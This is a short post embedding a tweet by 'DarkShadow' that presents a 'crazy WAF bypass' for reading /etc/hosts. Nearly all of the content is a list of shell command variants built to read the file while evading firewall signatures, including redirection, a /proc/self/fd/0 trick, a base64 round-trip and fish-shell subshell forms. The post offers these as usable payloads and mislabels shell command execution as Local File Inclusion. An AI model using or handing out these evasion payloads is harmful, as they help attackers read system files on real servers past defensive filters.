This tweet showcases a Local File Inclusion (LFI) WAF bypass using the payload 'cat /etc/hosts'. The payload triggers the WAF by reading the '/etc/hosts' file. Other variations of the payload include 'cat < /etc/hosts', 'cat /proc/self/fd/0 < /etc/hosts', 'cat /etc/hosts | base64 | base64 -d', 'cat /etc/hosts | string collect', '`cat /etc/hosts | while read line; echo $line; end`', and 'echo (cat /etc/hosts)'. Stay tuned for more details in the next post by DarkShadow.
Part-3
Crazy WAF Bypass:
cat /etc/hosts – triggers WAFcat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect
`cat /etc/hosts | while read line; echo $line; end`
echo (cat /etc/hosts)"More next post"
DarkShadow— dark shadow (@darkshadow2bd) March 18, 2025